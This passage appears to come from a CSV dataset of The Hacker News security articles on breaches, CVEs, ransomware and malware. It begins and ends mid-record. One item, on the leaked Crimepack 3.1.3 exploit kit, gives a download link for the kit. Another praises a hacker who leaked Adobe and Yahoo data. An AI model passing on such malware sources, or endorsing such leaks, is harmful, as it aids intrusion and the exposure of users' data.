customers' Bitcoins, Hong Kong-based Bitcoin exchange announced a reward of $3.5 Million to anyone who can provide information that leads to the recovery of the stolen Bitcoins. The incident was so big that the price of Bitcoin was dropped almost 20%, from $602.78 to $541 per Bitcoin, within a day after the announcement. ",Cyber_Attack Health Insurer Excellus Hacked; 10.5 Million Records Breached,https://thehackernews.com/2015/09/health-insurance-hacking.html,"Health Care Hacks — the choice of hackers this year! In a delayed revelation made by Excellus BlueCross BlueShield (BCBS), which says that about 10.5 Millions of their clients' data and information has been compromised by hackers. Excellus BCBS headquartered in Rochester, New York, provides finance and health care services across upstate New York and long-term care insurance nationwide. On August 5, 2015, Excellus BCBS discovered that the hackers targeted their IT systems back in December 2013, initiating a sophisticated attack to gain access to their systems and record client's personal data. The Compromised Data includes: Social Security Number (SSN) Date of birth Mailing address Telephone number Member identification number Financial account information Claims information Did they forget something?...It seems everything is gone! Moreover, it's been two years Excellus systems were open to the hackers. So, what the company was doing all this time? Excellus BlueCross BlueShield in their statement said: ""This incident also affected members of other Blue Cross Blue Shield plans who sought treatment in the 31 county upstate New York service area of Excellus BCBS. Individuals who do business with us and provided us with their financial account information or Social Security number are also affected."" The company has hired Mandiant Incident Response Team of FireEye Inc to help investigate the matter and to bring its systems back to normal by providing adequate remediation solutions. Though the investigation has gathered no such evidence relating to removal of data, use or misuse of the compromised data. Further, To save customers valuable data, the company showed concerns for the affected customers and said that they are going to: Mail letters to its customers to let them know the facts and how they can in future secure their identity. Offer cover of two years of free identity theft protection services and credit monitoring to affected individuals. Moreover, for others, who are worried regarding their security can contact Excellus on 1-877-589-3331 (Toll-free) to know about the incident. At the start of this year, Cyber attacks victims in health care were: Anthem Healthcare with data breach of 80 million (the largest of all) Premera with approximately 11 millions of users personal data being stolen UCLA Health System with 4.5 millions of data leaks leading to identity theft CareFirst with affecting 1.1 million (approx) customers All the above companies were using BlueCross BlueShield insurance plans except UCLA health system. Also, we need to think that for what purpose the hackers are going to use this bulk information...or is it the calm before the storm? If we notice, vendors running BCBS plans are the ones mostly affected by this data breach. So is the BCBS Association the target of the hackers? That one after the other its vendors offering insurance services are being victims of such massive data breaches. This indeed makes us think of the potential of not only the cyber attacks and security but also the current threats to health care and associated bio-medical devices. ",Data_Breaches Exim TLS Flaw Opens Email Servers to Remote 'Root' Code Execution Attacks,https://thehackernews.com/2019/09/exim-email-server-vulnerability.html,"A critical remote code execution vulnerability has been discovered in the popular open-source Exim email server software, leaving at least over half a million email servers vulnerable to remote hackers. Exim maintainers today released Exim version 4.92.2 after publishing an early warning two days ago, giving system administrators a heads-up on its upcoming security patches that affect all versions of the email server software up to and including then-latest 4.92.1. Exim is a widely used, open source mail transfer agent (MTA) software developed for Unix-like operating systems such as Linux, Mac OSX or Solaris, which runs almost 60% of the internet's email servers today for routing, delivering and receiving email messages. Tracked as CVE-2019-15846, the security vulnerability only affects Exim servers that accept TLS connections, potentially allowing attackers to gain root-level access to the system ""by sending an SNI ending in a backslash-null sequence during the initial TLS handshake."" SNI, stands for Server Name Indication, is an extension of the TLS protocol that allows the server to safely host multiple TLS certificates for multiple sites, all under a single IP address. According to the Exim team, since the vulnerability doesn't depend on the TLS library being used by the server, both GnuTLS and OpenSSL are affected. Moreover, though the default configuration of the Exim mail server software doesn't come with TLS enabled, some operating systems bundled the Exim software with the vulnerable feature enabled by default. The vulnerability was discovered by an open source contributor and security researcher who goes by the online alias Zerons and analyzed by cybersecurity experts at Qualys. Just three months ago, Exim also patched a severe remote command execution vulnerability, tracked as CVE-2019-10149, that was actively exploited in the wild by various groups of hackers to compromise vulnerable servers. The Exim advisory says that a rudimentary proof of concept (PoC) exists for this flaw, but currently there is no known exploit available to the public. Server administrators are highly recommended to install the latest Exim 4.92.2 version immediately, and if not possible, can mitigate the issue by not allowing unpatched Exim servers to accept TLS connections. The team says, ""If you can't install the above versions, ask your package maintainer for a version containing the backported fix. On request and depending on our resources we will support you in backporting the fix."" ",Vulnerability Hackers Are Targeting Microsoft Exchange Servers With Ransomware,https://thehackernews.com/2021/03/icrosoft-exchange-ransomware.html,"It didn't take long. Intelligence agencies and cybersecurity researchers had been warning that unpatched Exchange Servers could open the pathway for ransomware infections in the wake of swift escalation of the attacks since last week. Now it appears that threat actors have caught up. According to the latest reports, cybercriminals are leveraging the heavily exploited ProxyLogon Exchange Server flaws to install a new strain of ransomware called ""DearCry."" ""Microsoft observed a new family of human operated ransomware attack customers – detected as Ransom:Win32/DoejoCrypt.A,"" Microsoft researcher Phillip Misner tweeted. ""Human operated ransomware attacks are utilizing the Microsoft Exchange vulnerabilities to exploit customers."" Microsoft's security intelligence team, in a separate tweet, confirmed that it has begun ""blocking a new family of ransomware being used after an initial compromise of unpatched on-premises Exchange Servers."" Security firm Kryptos Logic said it identified about 6,970 exposed web shells, some of which were used to infect the compromised servers with DearCry ransomware, suggesting that other cybercriminal groups are piggybacking on the first-stage web shell backdoor planted by the Hafnium threat actor to install additional malware of their choice. Calling DearCry a ""copy"" ransomware, Sophos Director Mark Loman said the strain creates encrypted copies of the attacked files using an encryption key embedded in the ransomware binary and deletes the original versions, thereby allowing the victims to ""potentially recover some data"" due to this encryption-behavior. ""Defenders should take urgent steps to install Microsoft's patches to prevent exploitation of their Microsoft Exchange patches. If this is not possible, the server should be disconnected from the internet or closely monitored by a threat response team,"" Loman said. In a joint advisory published by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) and the Federal Bureau of Investigation (FBI), the agencies warned that ""adversaries could exploit these vulnerabilities to compromise networks, steal information, encrypt data for ransom, or even execute a destructive attack."" Successful weaponization of the flaws allows an attacker to access victims' Exchange Servers, enabling them to gain persistent system access and control of an enterprise network. With the new ransomware threat, unpatched Servers are not only at risk of potential data theft but also get potentially encrypted, preventing access to an organization's mailboxes. PoC Takedown From GitHub Triggers Debate Meanwhile, as nation-state hackers and cybercriminals pile on to take advantage of the ProxyLogon flaws, a proof-of-concept (PoC) code shared on Microsoft-owned GitHub by a security researcher has been taken down by the company, citing that the exploit is under active attack. In a statement to Vice, the company said, ""In accordance with our Acceptable Use Policies, we disabled the gist following reports that it contains proof of concept code for a recently disclosed vulnerability that is being actively exploited."" The move has also sparked a debate of its own, with researchers arguing that Microsoft is ""silencing security researchers"" by removing PoCs shared on GitHub. ""This is huge, removing a security researchers code from GitHub against their own product and which has already been patched,"" TrustedSec's Dave Kennedy said. ""It was a PoC, not a working exploit — none of the PoCs have had the RCE. Even if it did, that's not their call on when the appropriate time to release is. It's an issue in their own product, and they are silencing security researchers on that."" This was also echoed by Google Project Zero researcher Tavis Normandy. ""If the policy from the start was no PoC/metasploit/etc — that would suck, but it's their service,"" Normandy said in a tweet. ""Instead they said OK, and now that it's become the standard for security pros to share code, they have elected themselves the arbiters of what is 'responsible.' How convenient."" But replying to Kennedy on Twitter, security researcher Marcus Hutchins said ""'Has already been patched.' Dude, there's more than 50,000 unpatched exchange servers out there. Releasing a full ready to go RCE chain is not security research, it's recklessness and stupid."" If anything, the avalanche of attacks should serve as a warning to patch all versions of the Exchange Server as soon as possible, while also take steps to identify signs of indicators of compromise associated with the hacks, given that the attackers were exploiting these zero-day vulnerabilities in the wild for at least two months before Microsoft released the patches on March 2. ",Malware Critical Pre-Auth RCE Flaw Found in F5 Big-IP Platform — Patch ASAP!,https://thehackernews.com/2021/03/critical-pre-auth-rce-flaw-found-in-f5.html,"Application security company F5 Networks on Wednesday published an advisory warning of four critical vulnerabilities impacting multiple products that could result in a denial of service (DoS) attack and even unauthenticated remote code execution on target networks. The patches concern a total of seven related flaws (from CVE-2021-22986 through CVE-2021-22992), two of which were discovered and reported by Felix Wilhelm of Google Project Zero in December 2020. The four critical flaws affect BIG-IP versions 11.6 or 12.x and newer, with a critical pre-auth remote code execution (CVE-2021-22986) also affecting BIG-IQ versions 6.x and 7.x. F5 said it's not aware of any public exploitation of these issues. Successful exploitation of these vulnerabilities could lead to a full compromise of vulnerable systems, including the possibility of remote code execution as well as trigger a buffer overflow, leading to a DoS attack. Urging customers to update their BIG-IP and BIG-IQ deployments to a fixed version as soon as possible, F5 Networks' Kara Sprague said the ""vulnerabilities were discovered as a result of regular and continuous internal security testing of our solutions and in partnership with respected third parties working through F5's security program."" The vulnerabilities have been addressed in the following products: BIG-IP versions: 16.0.1.1, 15.1.2.1, 14.1.4, 13.1.3.6, 12.1.5.3, and 11.6.5.3 BIG-IQ versions: 8.0.0, 7.1.0.3, and 7.0.0.2 Besides these flaws, Wednesday's patches also include fixes for 14 other unrelated security issues. The fixes are notable for the fact that it's the second time in as many years that F5 has revealed flaws that could allow remote code execution. The latest update to BIG-IP software arrives less than a year after the company addressed a similar critical flaw (CVE-2020-5902) in early July 2020, with multiple hacking groups exploiting the bug to target unpatched devices, prompting the U.S. Cybersecurity and Infrastructure Security Agency (CISA) to issue an alert cautioning of a ""broad scanning activity for the presence of this vulnerability across federal departments and agencies."" ""This bug is probably going to fly under the radar, but this is a much bigger deal than it looks because it says something is really really broken in the internal security process of F5 BIG-IP devices,"" said Matt ""Pwn all the Things"" Tait in a tweet. ",Malware Unbreakable Apple's iMessage encryption is vulnerable to eavesdropping attack,https://thehackernews.com/2013/10/unbreakable-apples-imessage-encryption.html,"Though Apple claims iMessage has end-to-end encryption, But researchers claimed at a security conference that Apple's iMessage system is not protected and the company can easily access it. Cyril Cattiaux - better known as pod2g, who has developed iOS jailbreak software, said that the company's claim about iMessage protection by unbreakable encryption is just a lie, because the weakness is in the key infrastructure as it is controlled by Apple: they can change a key anytime they want, thus read the content of our iMessages. Basically, when you send an iMessage to someone, you grab their public key from Apple, and encrypt your message using that public key. On the other end, recipients have their own private key that they use to decrypt this message. A third-party won't be able to see the actual message unless they have access to the private key. Trust and public keys always have a problem, but the researchers noted that there's no evidence that Apple or the NSA is actually reading iMessages, but say that it's possible. ""Apple has no reason to do so. But what of intelligence agencies?"" he said. The researchers were able to create a bogus certificate authority and then add it to an iPhone Keychain to proxify SSL encrypted communications to and from the device, and in the process discovered that their AppleID and password was being transmitted in clear text. He says that since Apple controls the public key directory that gives you the public key for every user, it could perform a man-in-the-middle (MITM) attack to intercept your messages if asked to by a government agency. A solution for Apple would be to store public keys locally in a protected database within iOS, as then the keys could be compared. ",Vulnerability Rogue software update cause Malware attack on Japanese Nuclear Power Plant,https://thehackernews.com/2014/01/rogue-software-update-cause-malware_9.html,"The most critical and worst target of a State-sponsored cyber-attacks could be Hospitals, Dams, Dykes and Nuclear power stations and this may cause military conflicts between countries. According to Japan Today, The Monju nuclear power plant in Tsuruga, Japan was accidentally targeted by a malware on 2nd January, when a worker updated the system to the latest version of the video playback program. Monju Nuclear Plant is a sodium-cooled fast reactor, was launched in April 1994. It has not been operational for most of the past 20 years, after an accident in which a sodium leak caused a major fire. Employees over there are only left with a regular job of company's paperwork and maintenance. So the malware could have stolen only some sensitive documents, emails, training records and employees' data sheets. The Malware command-and-control server suspected to be from South Korea. The malware itself is not much sophisticated like Stuxnet or Duqu, but the unmanaged software update and patch management system can seriously lead to a critical cyber attack. Even being isolated from the Internet does not prevent you from being infected. One of the best examples of flawed Internal policies is Stuxnet, one of the most infamous pieces of malware ever created to destroy Iranian Nuclear plants and infected the systems through a USB stick only. Also in November, The Kaspersky revealed that Russian astronauts carried a removable device into space which infected systems on the space station. ",Data_Breaches Hacking Facebook users just from chat box using multiple vulnerabilities,https://thehackernews.com/2013/04/hacking-facebook-users-just-from-chat.html,"Nir Goldshlager, Founder/CEO at Break Security known for finding serious flaws in Facebook once again on The Hacker News for sharing his new finding i.e Stored Cross-site Scripting (XSS) in Facebook Chat, Check In and Facebook Messenger. Stored Cross-site Scripting (XSS) is the most dangerous type of Cross Site Scripting. Web applications where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc 1.) Stored XSS In Facebook Chat: This vulnerability can be used to conduct a number of browser-based attacks including, Hijacking another user's browser, Capturing sensitive information viewed by application users, Malicious code is executed by the user's browser etc. When a user starts a new message within Facebook that has a link inside, a preview GUI shows up for that post. The GUI is used for presenting the link post using a parameter i.e attachment[params][title],attachment[params][urlInfo][final] , which was not actually filtered for valid links by Facebook. For proof of concept, Goldshlager exploit this flaw in a way, that each time the victim clicks on this malicious message in Facebook Chat, the Stored XSS will begin to run on their client, as shown: 2.) Stored XSS In Facebook Check-In: The other major and an interesting Stored XSS that Nir reported is in the Facebook Check-In Screen. To exploit this loophole the attackers needs to first construct a new location within Facebook Pages and then, the attacker must change the settings in those new location. When the victim later decides to go to the place the attacker has been, a Stored XSS will run client-side. 3.) Stored XSS In Facebook Messenger (Windows): 3rd and serious flaw in Facebook is capable of injecting a Stored XSS Payload in Facebook Messenger for Windows. Any time the victim sign in into their account in the Messenger, the Stored XSS code will execute on victim's end. Video Demonstrations Bugs was reported to Facebook last month by Nir and already patched by Facebook security team. Old Finding by Nir: Facebook OAuth flaw allows gaining full control over any Facebook account Facebook hacking accounts using another OAuth vulnerability URL Redirection flaw in Facebook apps push OAuth vulnerability again in action ",Vulnerability "Crimepack 3.1.3 Exploit kit Leaked, available for Download !",https://thehackernews.com/2011/05/crimepack-313-exploit-kit-leaked.html,"Crimepack 3.1.3 Exploit kit Leaked, available for Download ! Part 1: Java Exploit As stated above, I focus on a malware that exploits a recent JRE vulnerability: CVE-2010-0840 to execute malicious files on a victim system. This malware comes inside a jar file, which contains the following two classes: Crimepack.class and KAVS.class. Part 1.1: Crimepack.class This class is the engine of the malware, it is obfuscated, but you can quickly strip off the obfuscation (my python beta tool is great…), once you get rid of the obfuscation you can see the following code: As always, we have an Applet that access to the data parameter, generates a random name for the exe payload that will be dropped in the system temp directory and then executed. So at this point as you can see we have nothing new, the above is a common Java downloader… but let's scroll down: Above, we can see that the malware is creating a new instance of the KAVS class (description follows), in order to trigger the JRE vulnerability by using a call to the getValue() method (..snipped above..). Part 1.2: KAVS.class Here is the hand-crafted class, I say hand-crafted because such class cannot be compiled by using a standard compiler, so you have to edit the compiled class by editing the bytecode: Part 2: PDF-generator on demand The kit contains a nice php script that drops custom pdf on-demand, which means that you can have several mutations of the same piece of malware, by simply connecting to a malicious link. Download Here : https://www.multiupload.com/3HGKHWMRS5 Source ",Malware "DNS cache poisoning attack on Google, Gmail, YouTube, Yahoo, Apple",https://thehackernews.com/2011/12/dns-cache-poisoning-attack-on-google.html,"DNS cache poisoning attack on Google, Gmail, YouTube, Yahoo, Apple Hacker with nickname AlpHaNiX deface Google, Gmail, Youtube, Yahoo, Apple etc domains of Democratic Republic of Congo. Hacker use strategy so-called DNS cache poisoning. DNS cache poisoning is a security or data integrity compromise in the Domain Name System (DNS). The compromise occurs when data is introduced into a DNS name server's cache database that did not originate from authoritative DNS sources. It may be a deliberate attempt of a maliciously crafted attack on a name server. Hacked websites are : https://apple.cd/ https://yahoo.cd/ https://gmail.cd/ https://google.cd/ https://youtube.cd/ https://linux.cd/ https://samsung.cd/ https://hotmail.cd/ https://microsoft.cd/ [Source] ",Vulnerability New Mac Malware 'Dockster' Found on Dalai Lama site,https://thehackernews.com/2012/12/new-mac-malware-dockster-found-on-dalai.html,"A new trojan horse app called Dockster is targeting Mac users by exploiting a known Java vulnerability CVE-2012-0507. The trojan is apparently being delivered through a website (gyalwarinpoche.com) dedicated to the Dalai Lama and once installed can collect user keystrokes and other personal information. Mac in Danger ? Earlier this spring, a Russian security firm discovered a trojan piece of malware which took advantage of a Java vulnerability on many computers, Macs and PCs alike. This trojan, known as ""Flashback,"" was used to enlist some 600,000 infected computers into a botnet. Malware also provides an interface that allows attackers to download and execute additional malware. Dockster has been found to use the same exploit code as the previous SabPab virus to gain access through a backdoor. Dockster is also said to launch an agent called mac.dockset.deman, which restarts each time a user logs in to their Mac. Dockster is only the latest Mac-based threat to hit organizations and people sympathetic to Tibet's conflict with the Chinese government. In April, another piece of malware, known as ""Backdoor.OSX.SabPub,"" or ""SabPub"" was found and distributed through Microsoft Office files sent to those who may sympathize with Tibet. The attackers behind SabPub used a technique known as ""Spear-Phishing,"" a practice used to target smaller groups of people as opposed to sending out mass emails in hopes that someone will click a link. In September, security firm AlienVault said it had discovered the creator of the PlugX Remote Access Tool (RAT), which had been used by hackers from various countries to target Tibet. The creator hailed from China. ",Malware First Android Clipboard Hijacking Crypto Malware Found On Google Play Store,https://thehackernews.com/2019/02/android-clickboard-hijacking.html,"A security researcher has discovered yet another cryptocurrency-stealing malware on the official Google Play Store that was designed to secretly steal bitcoin and cryptocurrency from unwitting users. The malware, described as a ""Clipper,"" masqueraded as a legitimate cryptocurrency app and worked by replacing cryptocurrency wallet addresses copied into the Android clipboard with one belonging to attackers, ESET researcher Lukas Stefanko explained in a blog post. Since cryptocurrency wallet addresses are made up of long strings of characters for security reasons, users usually prefer copying and pasting the wallet addresses using the clipboard over typing them out. The newly discovered clipper malware, dubbed Android/Clipper.C by ESET, took advantage of this behavior to steal users cryptocurrency. To do this, attackers first tricked users into installing the malicious app that impersonated a legitimate cryptocurrency service called MetaMask, claiming to let users run Ethereum decentralized apps in their web browsers without having to run a full Ethereum node. Officially, the legitimate version of MetaMask is only available as a web browser extension for Chrome, Firefox, Opera, or Brave, and is not yet launched on any mobile app stores. However, Stefanko spotted the malicious MetaMask app on Play Store targeting users who want to use the mobile version of the service by changing their legitimate cryptocurrency wallet address to the hacker's own address via the clipboard. As a result, users who intended to transfer funds into a cryptocurrency wallet of their choice would instead make a deposit into the attacker's wallet address pasted by the malicious app. ""Several malicious apps have been caught previously on Google Play impersonating MetaMask. However, they merely phished for sensitive information with the goal of accessing the victims' cryptocurrency funds,"" Stefanko said. ""Android Clipper targeted Bitcoin and Ethereum cryptocurrency addresses when being copied in to clipboard and replaced them with the attacker's wallet address. Once this transaction is sent, it can not be canceled."" Stefanko spotted the malicious MetaMask app, which he believes was the first Android Trojan Clipper to be discovered on Play Store, shortly after its introduction to the app store on February 1. Google took down the malicious app almost immediately after being notified by the researcher. While the bitcoin price has been dropped steadily since hitting its all-time high in December 2017, there is no reduction (in fact rise) in the cryptocurrency scandals, thefts, and scams that continue to plague the industry. Just last week, The Hacker News reported how customers of the largest Canadian bitcoin exchange QuadrigaCX lost $145 million in cryptocurrency after the sudden death of its owner who was the only one with access to the company's cold (offline) storage wallets. However, some users and researchers are suggesting the incident could be an exit scam. ",Malware The FixMeStick : My Parents Need This,https://thehackernews.com/2012/09/the-fixmestick-my-parents-need-this.html,"The founders over at FixMeStick sent us a pair of their latest devices to check out. The FixMeStick is, in short, a malware removal device for dummies. The FixMeStick is a bootable USB device running Lubuntu and integrates three separate anti-virus scanners from Kaspersky Labs, Sophos, and GFI. While our readers will probably never need it for themselves, we may all wish we had something like this for our non-technical friends and family, or the 9 million PCs infected with ZeroAccess botnet. The FixMeStick does a lot of things that nobody else does on a bootable USB, and let's be real, removing rootkits is never pleasant or easy. Why I Want it For My Parents Linux: the FixMeStick is a Linux-based device that runs before Windows boots enabling it to remove infections without the infection getting stealthy or playing war with my parent's anti-virus software. N-Scanner architecture: contains an integrated multi-scanner composed of three engines: Kaspersky Labs, Sophos, and GFI's VIPRE. Full screen app: all the technology is integrated behind a single full-screen application, my parents never see Linux, or any of the three anti-virus engines. Typical Linux shortcut keys still work, but there's no risk of my mother wandering off into vi. It's the easiest thing to use: right out of the box my parents just plug it into a USB port and double-click ""Run FixMeStick"". There's no software to install. The FixMeStick does this clever little hack with the Windows boot manager getting Windows to boot the FixMeStick one time. This means my parents don't have to futz with the BIOS, but you still can if you want to. WiFi: supports wireless adapters and automatically finds my parents SSID and password from the Windows side and sets up the connection. My parents do nothing. I get no phone call from them. Automatic updates are fetched and stored directly on the FixMeStick. It boots on everything: the boot-loader is setup such that it can support different boot configurations without my parents having to do anything. BIOS compatibility has been a killer to Live USBs, but we've not found a PC the FixMeStick will not boot on, including the fancy VAIOs that ship with a Boot From External Device setting off by default. Out-of-band-management: this is quite cool, there's a remote connection client built into the FixMeStick, so if my parents need support, the FixMeStick engineers can connect directly to the device without my parents having to do anything other than provide the randomly generated userid and password generated by the app. What's Not Good: Out-of-band-management! A bad actor could call my parents and tell them to plug in the FixMeStick and get the userid\password. Of course, such a social engineering attack is possible whether there's a FixMeStick in the house or not. Denial of Service: Malware can deny access to the FixMeStick by smoking the MBR or the Linux files. There are a few ways to fix this, and you probably know what they are, and we expect to see one implemented in the next major version of the FixMeStick. 50% Discounts for The Hacker News readers: Overall, we like this product. It's practical and well built. And while the digital futurists may be calling the end of the PC, the next massive botnet is not likely to run on iOS or Android. The FixMeStick provides a practical means for non-technical people to clean their own PCs. Other, back of the box type information: $49.99, with free shipping to anywhere in the world. Toll free support with the real security people. Works an unlimited number of times on up to 3 different PCs for a year. The PC count is reset each calendar month so people don't have to worry about adding\retiring PCs. When the year is up, recharges can be purchased from www.FixMeStick.com. The Windows launcher works on Windows XP, Vista, 7, and 8. A minimum of 512MB RAM on the host PC. Here's a coupon for the first 50 The Hacker News readers for 50% off the FixMeStick: FixMeStick-THN. You can have it shipped directly to your parents ;) ",Malware Researcher Demonstrates 4 New Variants of HTTP Request Smuggling Attack,https://thehackernews.com/2020/08/http-request-smuggling.html,"A new research has identified four new variants of HTTP request smuggling attacks that work against various commercial off-the-shelf web servers and HTTP proxy servers. Amit Klein, VP of Security Research at SafeBreach who presented the findings today at the Black Hat security conference, said that the attacks highlight how web servers and HTTP proxy servers are still susceptible to HTTP request smuggling even after 15 years since they were first documented. What is HTTP Request Smuggling? HTTP request smuggling (or HTTP Desyncing) is a technique employed to interfere with the way a website processes sequences of HTTP requests that are received from one or more users. Vulnerabilities related to HTTP request smuggling typically arise when the front-end (a load balancer or proxy) and the back-end servers interpret the boundary of an HTTP request differently, thereby allowing a bad actor to send (or ""smuggle"") an ambiguous request that gets prepended to the next legitimate user request. This desynchronization of requests can be exploited to hijack credentials, inject responses to users, and even steal data from a victim's request and exfiltrate the information to an attacker-controlled server. The technique was first demonstrated in 2005 by a group of researchers from Watchfire, including Klein, Chaim Linhart, Ronen Heled, and Steve Orrin. But in the last five years, a number of improvements have been devised, significantly expanding on the attack surface to splice requests into others and ""gain maximum privilege access to internal APIs,"" poison web caches, and compromise login pages of popular applications. What's New? The new variants disclosed by Klein involve using various proxy-server combinations, including Aprelium's Abyss, Microsoft IIS, Apache, and Tomcat in the web-server mode, and Nginx, Squid, HAProxy, Caddy, and Traefik in the HTTP proxy mode. The list of all new four new variants is as below, including an old one that the researcher successfully exploited in his experiments. Variant 1: ""Header SP/CR junk: …"" Variant 2 – ""Wait for It"" Variant 3 – HTTP/1.2 to bypass mod_security-like defense Variant 4 – a plain solution Variant 5 – ""CR header"" When handling HTTP requests containing two Content-Length header fields, Abyss, for example, was found to accept the second header as valid, whereas Squid used the first Content-Length header, thus leading the two servers to interpret the requests differently and achieve request smuggling. In situations where Abyss gets an HTTP request with a body whose length is less than the specified Content-Length value, it waits for 30 seconds to fulfill the request, but not before ignoring the remaining body of the request. Klein found that this also results in discrepancies between Squid and Abyss, with the latter interpreting portions of the outbound HTTP request as a second request. A third variant of the attack uses HTTP/1.2 to circumvent WAF defenses as defined in OWASP ModSecurity Core Rule Set (CRS) for preventing HTTP request smuggling attacks craft a malicious payload that triggers the behavior. Lastly, Klein discovered that using the ""Content-Type: text/plain"" header field was sufficient to bypass paranoia level checks 1 and 2 specified in CRS and yield an HTTP Request Smuggling vulnerability. What Are the Possible Defenses? After the findings were disclosed to Aprelium, Squid, and OWASP CRS, the issues were fixed in Abyss X1 v2.14, Squid versions 4.12, and 5.0.3 and CRS v3.3.0. Calling for normalization of outbound HTTP Requests from proxy servers, Klein stressed the need for an open source, robust web application firewall solution that's capable of handling HTTP Request Smuggling attacks. ""ModSecurity (combined with CRS) is indeed an open source project, but as for robustness and genericity, mod_security has several drawbacks,"" Klein noted. ""It doesn't provide full protection against HTTP Request Smuggling [and] it is only available for Apache, IIS and nginx."" To this end, Klein has published a C++-based library that ensures that all incoming HTTP requests are entirely valid, compliant, and unambiguous by enforcing strict adherence to HTTP header format and request line format. It can be accessed from GitHub here. ",Cyber_Attack Bad Rabbit: New Ransomware Attack Rapidly Spreading Across Europe,https://thehackernews.com/2017/10/bad-rabbit-ransomware-attack.html,"A new widespread ransomware attack is spreading like wildfire around Europe and has already affected over 200 major organisations, primarily in Russia, Ukraine, Turkey and Germany, in the past few hours. Dubbed ""Bad Rabbit,"" is reportedly a new Petya-like targeted ransomware attack against corporate networks, demanding 0.05 bitcoin (~ $285) as ransom from victims to unlock their systems. According to an initial analysis provided by the Kaspersky, the ransomware was distributed via drive-by download attacks, using fake Adobe Flash players installer to lure victims' in to install malware unwittingly. ""No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. We've detected a number of compromised websites, all of which were news or media websites."" Kaspersky Lab said. However, security researchers at ESET have detected Bad Rabbit malware as 'Win32/Diskcoder.D' — a new variant of Petya ransomware, also known as Petrwrap, NotPetya, exPetr and GoldenEye. Bad Rabbit ransomware uses DiskCryptor, an open source full drive encryption software, to encrypt files on infected computers with RSA 2048 keys. ESET believes the new wave of ransomware attack is not using EternalBlue exploit — the leaked SMB vulnerability which was used by WannaCry and Petya ransomware to spread through networks. Instead it first scans internal network for open SMB shares, tries a hardcoded list of commonly used credentials to drop malware, and also uses Mimikatz post-exploitation tool to extract credentials from the affected systems. The ransom note, shown above, asks victims to log into a Tor onion website to make the payment, which displays a countdown of 40 hours before the price of decryption goes up. The affected organisations include Russian news agencies Interfax and Fontanka, payment systems on the Kiev Metro, Odessa International Airport and the Ministry of Infrastructure of Ukraine. Researchers are still analyzing Bad Rabbit ransomware to check if there is a way to decrypt computers without paying ransomware and how to stop it from spreading further. How to Protect Yourself from Ransomware Attacks? Kaspersky suggest to disable WMI service to prevent the malware from spreading over your network. Most ransomware spread through phishing emails, malicious adverts on websites, and third-party apps and programs. So, you should always exercise caution when opening uninvited documents sent over an email and clicking on links inside those documents unless verifying the source to safeguard against such ransomware infection. Also, never download any app from third-party sources, and read reviews even before installing apps from official stores. To always have a tight grip on your valuable data, keep a good backup routine in place that makes their copies to an external storage device that isn't always connected to your PC. Make sure that you run a good and effective anti-virus security suite on your system, and keep it up-to-date. ",Cyber_Attack "Yahoo data leak by Virus_Hima, Why do we need a proactive security?",https://thehackernews.com/2012/12/yahoo-data-leak-by-virushima-why-do-we.html,"In November I was contacted for first time by the Egyptian Hacker named ViruS_HimA who announced me to have hacked into Adobe servers and leaked private data. The hacker violated Adobe servers gaining full access and dumping the entire database with more of 150,000 emails and hashed passwords of Adobe employees and customers/partner of the firm such as US Military, USAF, Google, Nasa DHL and many other companies. ViruS_HimA specifically addressed the inefficient and slow patch management process that leaves exposed for long period ""big companies"". ""When someone report vulnerability to them, It take 5-7 days for the notification that they've received your report!! It even takes 3-4 months to patch the vulnerabilities! Such big companies should really respond very fast and fix the security issues as fast as they can."" Like , we reported two days before that one month old reported critical vulnerability of account hijacking in Outlook and Hotmail is still working and Microsoft is not in any mood to fix it soon. In a blog post, Adobe confirm that their ""Adobe Connect conferencing service"" forum was compromised and that the its database belongs only to the forum. Adobe also confirmed that ""not appear that any other Adobe services effected"" The attack wasn't politically motivated, ViruS_HimA desired to demonstrate how much vulnerable are also big enterprises such as Adobe, one of the most important company in IT landscape that leaks of a proper security defense. In that occasion the hacker anticipated a new striking attack against Yahoo. ""Don't be like Microsoft,Yahoo security teams!! but be like Google security team"" Qouted from Hima. As promised, the day has come, Yahoo data was stolen by Virus_Hima, that published the announcement on Pastebin and also on AnonPaste. In the first part of the post the hacker confirm to be a single individual with ethical intents, he is a passionate penetration tester that already found tens of 0-days vulnerabilities in big web sites such as Adobe/Micorsoft/Yahoo/Google/Apple/Facebook and many more. The hacker doesn't desire to damage the business of any company, he declared: ""I've published only little records for Adobe and I will never use/share/sell/publish Adobe/Yahoo data/exploits anywhere"" The situation appears paradoxical, according Virus_Hima the Yahoo company never replied to his alerts demonstrating the low attention to security questions : ""So i decided to teach both of them a hard lesson to harden them security procedures. It would make a disaster if such companies vulnerabilities was privately used in the underground and they never know about it! not only their customers been affected but the vendors themselves also suffer from such exploits. Adobe acrobat/flash, Yahoo data leak of that 400k emails, and that hotmail remote password reset vulnerabilities is an example.. "" The hacker to be credible decided to leak critical emails such as military ones to force companies to take action. He highlighted that acting in this was obtained a fast response, just one day, in the past when in similar situation he alerted the victims, the enterprises have released a patch in 3 or 4 months. Following the proofs of the hack proposed by the Egyptian hacker: 1.) Leaks contains: Full files backup for one of Yahoo domains!! [Lead to full access on the server of that domain] Full access to ""12"" of Yahoo Databases!! [Lead to full access on the server of that domain] Reflected-XSS(Cross Site Scripting) vulnerability. 2. ) Hints for DB's names: Pr***tionH**s, k*az*y << fair eh? 3.) XSS(Cross Site Scripting) vulnerability : The hacker desires also to inform the readers that he never sold Yahoo exploit before, the guy that done it in the past for 700$ is a different person. ""I'm not the one on the news who is selling the Yahoo xss for 700$, you may noticed that his name is ""TheHell"" idk why that krebsonShitz is linking me to that attack! why i don't sell things I got here? while it's awesome stuff not just XSS!!! 2- I'm not planning to do any more leaks soon!"" ViruS_HimA is a good guy that lives for security and believes in what he does, I consider this hacks very useful for the victims, a lesson to learn, an opportunity to make treasure of errors that everyone could commit. The real error in cases like this is to remain deaf to the alarms, Vurus_HimA closed the saying: ""Always be proactive not reactive in safeguarding your critical data."" I totally share his thought. ",Vulnerability Critical RCE Vulnerability Found in VMware vCenter Server — Patch Now!,https://thehackernews.com/2021/05/critical-rce-vulnerability-found-in.html,"VMware has rolled out patches to address a critical security vulnerability in vCenter Server that could be leveraged by an adversary to execute arbitrary code on the server. Tracked as CVE-2021-21985 (CVSS score 9.8), the issue stems from a lack of input validation in the Virtual SAN (vSAN) Health Check plug-in, which is enabled by default in the vCenter Server. ""A malicious actor with network access to port 443 may exploit this issue 